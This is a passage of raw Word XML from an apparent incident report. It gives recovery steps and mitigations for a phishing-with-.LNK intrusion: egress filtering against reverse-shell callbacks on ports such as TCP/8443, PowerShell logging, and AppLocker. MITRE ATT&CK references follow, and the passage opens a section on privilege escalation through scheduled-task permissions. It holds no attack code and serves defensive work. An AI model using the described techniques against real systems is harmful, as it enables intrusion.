          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Recovery (prevent further compromise)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA4C67A" w14:textId="307530B4" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7BD869" w14:textId="6367057F" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reset credentials for the affected user account if interactive access </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>was</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50138F01" w14:textId="4417CE98" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Validate system integrity and restore normal operations only after verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5FCDDA" w14:textId="7EFA430C" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="00D01BC9" w:rsidP="6845FCFF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05690E39" w14:textId="77777777" w:rsidR="00C3354B" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00C3354B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc220896684"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Control/Mitigation </w:t>
      </w:r>
      <w:commentRangeStart w:id="18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:commentRangeEnd w:id="18"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="18"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B5843A" w14:textId="73FBB1B4" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="00D01BC9" w:rsidP="6845FCFF"/>
    <w:p w14:paraId="6ED78412" w14:textId="36C134FE" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Email attachment filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D230DB8" w14:textId="154A42E3" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Block</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> inbound </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.LNK attachments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from external senders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EE0F88" w14:textId="59ED9A5F" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Use sandbox detonation for suspicious attachments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1027D2AC" w14:textId="07F5E254" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FC22AA" w14:textId="0C5A38D6" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Egress filtering / outbound firewall control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683889A5" w14:textId="4F2B0CA6" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Restrict outbound traffic to untrusted destinations and uncommon ports (e.g., TCP/8443).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DA1CFD" w14:textId="75627D2A" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This directly disrupts reverse shell callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEEE8A0" w14:textId="7B180B99" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21598BCC" w14:textId="2F6D09A6" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell hardening and logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F087C3" w14:textId="488BDEDC" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Enable PowerShell logging (Script Block logging and Module logging).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ABA5B9" w14:textId="10859C1F" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Alert on PowerShell downloading executables to user-accessible directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F5F369" w14:textId="2AD9BC5F" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED300D4" w14:textId="6D28E133" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545F07EE" w14:textId="4C90A768" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Use AppLocker/WDAC to restrict execution from non-standard directories such as C:\icrm\.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107BBBC0" w14:textId="0CBAD6D9" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Prevents “download-to-folder and execute” payload behaviour.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7AAD05" w14:textId="61E36A1D" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7FE594" w14:textId="77777777" w:rsidR="00C3354B" w:rsidRPr="004D5913" w:rsidRDefault="00C3354B" w:rsidP="00C3354B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc220896685"/>
      <w:commentRangeStart w:id="20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:commentRangeEnd w:id="20"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="20"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9182" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4395"/>
        <w:gridCol w:w="4787"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C3354B" w:rsidRPr="004D5913" w14:paraId="01AA48A4" w14:textId="77777777" w:rsidTr="6845FCFF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="155B2BAE" w14:textId="2E126CF2" w:rsidR="6845FCFF" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Spearphishing Attachment (T1566.001) – MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4847D5B0" w14:textId="6C3EF860" w:rsidR="6845FCFF" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
            <w:hyperlink r:id="rId32">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1566/001/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C3354B" w:rsidRPr="004D5913" w14:paraId="6367E9C7" w14:textId="77777777" w:rsidTr="6845FCFF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2610725F" w14:textId="7ADD0BE6" w:rsidR="6845FCFF" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>User Execution: Malicious File (T1204.002) – MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38113212" w14:textId="2BBF66A0" w:rsidR="6845FCFF" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
            <w:hyperlink r:id="rId33">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1204/002/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C3354B" w:rsidRPr="004D5913" w14:paraId="4D13D95F" w14:textId="77777777" w:rsidTr="6845FCFF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C051227" w14:textId="3CAB920E" w:rsidR="6845FCFF" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ingress Tool Transfer (T1105) – MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="658C1550" w14:textId="43BAC68C" w:rsidR="6845FCFF" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
            <w:hyperlink r:id="rId34">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1105/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="6845FCFF" w14:paraId="5BE10695" w14:textId="77777777" w:rsidTr="6845FCFF">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FBAFFE0" w14:textId="51EEBB75" w:rsidR="6845FCFF" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows Command Shell (T1059.003) – MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B6AEAB2" w14:textId="31AA54C3" w:rsidR="6845FCFF" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
            <w:hyperlink r:id="rId35">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1059/003/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="6845FCFF" w14:paraId="20FBBF00" w14:textId="77777777" w:rsidTr="6845FCFF">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="552CC009" w14:textId="6E604CD5" w:rsidR="6845FCFF" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PowerShell (T1059.001) – MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66829552" w14:textId="67FA299F" w:rsidR="6845FCFF" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
            <w:hyperlink r:id="rId36">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1059/001/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="6845FCFF" w14:paraId="037881DC" w14:textId="77777777" w:rsidTr="6845FCFF">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56EA1BDD" w14:textId="3CE358C8" w:rsidR="6845FCFF" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>File Deletion (T1070.004) – MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08619863" w14:textId="483E9E30" w:rsidR="6845FCFF" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
            <w:hyperlink r:id="rId37">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1070/004/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="791B8C86" w14:textId="3F6DADE4" w:rsidR="6845FCFF" w:rsidRDefault="6845FCFF"/>
    <w:p w14:paraId="0D86ED74" w14:textId="77777777" w:rsidR="00C3354B" w:rsidRDefault="00C3354B" w:rsidP="00C3354B">
      <w:pPr>
        <w:widowControl/>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B01497" w14:textId="4E78E0F4" w:rsidR="00500AD9" w:rsidRDefault="00326ED4" w:rsidP="0050779F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="2812B242" w14:textId="651029AF" w:rsidR="00500AD9" w:rsidRDefault="14301521" w:rsidP="14301521">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc220896686"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Incident #002 – Privileged Escalation via Insecure Scheduled Task Permissions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="704D59CD" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRPr="003419C9" w:rsidRDefault="00500AD9" w:rsidP="00500AD9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc220896687"/>
      <w:commentRangeStart w:id="23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:commentRangeEnd w:id="23"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="23"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1472"/>
        <w:gridCol w:w="1499"/>
        <w:gridCol w:w="1499"/>
        <w:gridCol w:w="1502"/>
        <w:gridCol w:w="1498"/>
        <w:gridCol w:w="1712"/>
      </w:tblGrid>
      <w:tr w:rsidR="00500AD9" w14:paraId="777F9B07" w14:textId="77777777" w:rsidTr="14301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Align w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="627B06C8" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRPr="009F3FA8" w:rsidRDefault="00500AD9" w:rsidP="001B4A08">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="12"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24C0037F" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRPr="009F3FA8" w:rsidRDefault="00500AD9"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Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7552D4A2" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRPr="009F3FA8" w:rsidRDefault="00500AD9"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Technique Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05B43F38" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRPr="009F3FA8" w:rsidRDefault="00500AD9"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Sub-technique Name (if applicable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1498" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EE9FE43" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRPr="009F3FA8" w:rsidRDefault="00500AD9"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Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1712" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21CC5604" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRPr="009F3FA8" w:rsidRDefault="00500AD9"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Permissions Required to perform attack (User/Admin/NIL)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="370C8CBA" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRPr="009F3FA8" w:rsidRDefault="00500AD9"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color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="12"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00500AD9" w14:paraId="58A19987" w14:textId="77777777" w:rsidTr="1430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Align w:val="center"/>
          </w:tcPr>
